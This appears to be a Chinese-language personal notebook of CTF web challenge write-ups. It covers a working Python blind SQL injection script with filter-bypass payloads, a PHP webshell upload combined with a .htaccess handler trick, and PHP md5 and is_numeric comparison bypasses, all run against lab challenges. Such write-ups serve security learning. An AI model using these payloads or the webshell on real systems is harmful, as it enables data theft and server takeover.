note-32

[CISCN2019 华北赛区 Day2 Web1]Hack World

buucft里提示有sql，上来给了个输入框，但是是post而，抓包看：

POST /index.php HTTP/1.1
Host: cb3e0494-3cbe-4dca-b625-ed7bbc363bbe.node5.buuoj.cn:81
Content-Length: 4
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://cb3e0494-3cbe-4dca-b625-ed7bbc363bbe.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb3e0494-3cbe-4dca-b625-ed7bbc363bbe.node5.buuoj.cn:81/index.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

id=1

然后就是对id进行注入了,
用bp fuzz一下,大概过滤了

空格
or
||
and
&&
"
;
'xmlupdate()
/**/
`

试出如下

1^(length(database())=2)

若是length是对的会返回：
Error Occured When Fetch Result.

否则返回：
Hello, glzjin wants a girlfriend.

由此可以对进行盲注
先用bp已经测试出数据库长度为11；
找个脚本改改：

import requests
import time
# str= "-./0123456789:;<>=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~#"
url = 'http://69638964-21bc-445d-a323-6de57b0ff6bb.node5.buuoj.cn:81/'
database_name=''
name=""

for i in range (10,12):
    for l in range (32,127):
        time.sleep(0.2) 
        payload = '1^(ascii(substr(database(),{},1))={})'.format(i,l)
        data = {'id': payload}
        re = requests.post(url,data)
        print("testing 数据库名称第:",i,"第个",chr(l),"字符")
        if 'Error Occured When Fetch Result.' in re.text:
            name=name+chr(l)
            print("数据库名称：",name)
            break

# for i in range (1,l+1) :
#     for s in str:
#         payload = "1&&substr(database(),{},1)='{}'".format(i,s)
#         data = {'id': payload}
#         re = requests.post(url,data)
#         if 'Nu1L' in re.text:
#             database_name=database_name + s
#             print("第",i,"个字符： ",database_name)
#             break 

# for l in range (1,1000):
#     time.sleep(0.05) 
#     payload = "1&&length((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()))={} ".format(l)
#     data = {'id': payload}
#     re = requests.post(url,data)
#     print("表名长度:",l)
#     if 'Nu1L' in re.text:
#         print("全表名长度:",l)
#         break 
    
# for i in range (1,l+1):
#     for s in str:
#         time.sleep(0.05) 
#         payload = "1&&substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),{},1)='{}' ".format(i,s)
#         data = {'id': payload}
#         re = requests.post(url,data)
#         if 'Nu1L' in re.text:
#             name=name + s
#             print("表名:",name)
#             break

# flag=''
# for l in range (1,10000):
#     f=''
#     for s in range (32,127):
#         time.sleep(0.08)
#         f=flag + chr(s)
#         payload = '1&&((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(f)
#         data = {'id': payload}
#         re = requests.post(url,data)
#         if 'Nu1L' in re.text:
#             flag=flag + chr(s-1)
#             print(flag.lower)
#             break

先跑出数据库名：
ctftraining
然后题目给了表明和列明，那直接爆flag就行，那我跑库名干什么？
就当测试吧

import requests
import time
# str= "-./0123456789:;<>=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~#"
url = 'http://b74d121d-ae37-46c5-9e40-49750c875c6b.node5.buuoj.cn:81/index.php'
database_name=''
flag=""

for le in range (1,100):
    payload= '1^((length((select(flag)from(flag))))<{})'.format(le)
    data = {'id': payload}
    re = requests.post(url,data)
    print("测试flag长度中:",le)
    if 'Error Occured When Fetch Result.' in re.text:
        print("flag长度为:",le)
        break

for i in range (1,le+1):
    for l in range (32,117):
        time.sleep(0.1)
        payload = '1^((ascii(substr((select(flag)from(flag)),{},1)))={})'.format(i,l)
        data = {'id': payload}
        re = requests.post(url,data)
        print("flag名称第:",i,"个字符",chr(l),'    ',flag)
        if 'Error Occured When Fetch Result.' in re.text:
            flag=flag+chr(l)
            print("flag:",flag)
            break

# for i in range (1,l+1) :
#     for s in str:
#         payload = "1&&substr(database(),{},1)='{}'".format(i,s)
#         data = {'id': payload}
#         re = requests.post(url,data)
#         if 'Nu1L' in re.text:
#             database_name=database_name + s
#             print("第",i,"个字符： ",database_name)
#             break 

# for l in range (1,1000):
#     time.sleep(0.05) 
#     payload = "1&&length((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()))={} ".format(l)
#     data = {'id': payload}
#     re = requests.post(url,data)
#     print("表名长度:",l)
#     if 'Nu1L' in re.text:
#         print("全表名长度:",l)
#         break 
    
# for i in range (1,l+1):
#     for s in str:
#         time.sleep(0.05) 
#         payload = "1&&substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),{},1)='{}' ".format(i,s)
#         data = {'id': payload}
#         re = requests.post(url,data)
#         if 'Nu1L' in re.text:
#             name=name + s
#             print("表名:",name)
#             break

# flag=''
# for l in range (1,10000):
#     f=''
#     for s in range (32,127):
#         time.sleep(0.08)
#         f=flag + chr(s)
#         payload = '1&&((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(f)
#         data = {'id': payload}
#         re = requests.post(url,data)
#         if 'Nu1L' in re.text:
#             flag=flag + chr(s-1)
#             print(flag.lower)
#             break

可能是我昨晚做迷糊了，卡在length和substr里面用select需要再加一层括号里，卡了一个半小时，到凌晨3点半，
一道题做了三个半小时，道心破碎了；
至少最后独立做出来了；
flag{e53ac9ec-ab18-44e9-89b4-f1b39d8f813c}

[GXYCTF2019]BabyUpload

先传个🐎看看：

传php木马：
回显：后缀名不能有ph！

传正常png文件：
上传类型也太露骨了吧！

传jpg看看：
上传类型也太露骨了吧！

不管了，bp抓包改

Content-Disposition: form-data; name="uploaded"; filename="shell.jpeg"
Content-Type: image/jpeg

<script language='php'>@eval($_POST[zhong]);</script>
<script language='php'>system('cat /flag');</script>

成功：
/var/www/html/upload/407deea951641fdc86613277efecd816/shell.jpeg succesfully uploaded!

在浏览器上访问成功，但是用蚂蚁连接不上，应该也是没目录没php解析的问题，
观察到服务器端为apache
那应该就是尝试.htaccess

Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-php

/var/www/html/upload/407deea951641fdc86613277efecd816/.htaccess succesfully uploaded!

蚂蚁连接成功，在根目录找到flag
本来看到这串路径我还以为是随机目录之类的

乘机试了一下，想在.htaccess文件中直接添加木马，结果连不上，可能是不行吧
在upload目录下搞得，还把环境搞坏了

[MRCTF2020]Ez_bypass

打开题目：

I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) { //md5绕过，要求两个值不相等但是计算的md5相等，
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }  
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

第一先试一下数组绕过：

?id[]=0&gg[]=1

You got the first steponly one way to get the flag

然后添加post数据：

?id[]=0&gg[]=1

passwd=1234567

You got the first stepYou can not get it !

要对is_numeric进行绕过，源码里的：
if (!is_numeric($passwd))
是不能是纯数字意思
那passwd=1234567aa，
拿到flag，

php比较绕过 is_numeric()

因为php对字符串类型与整数类型进行==比较时会把字符串转化为整型数据，
此时
1234567aa 就会变为 1234567
实现比较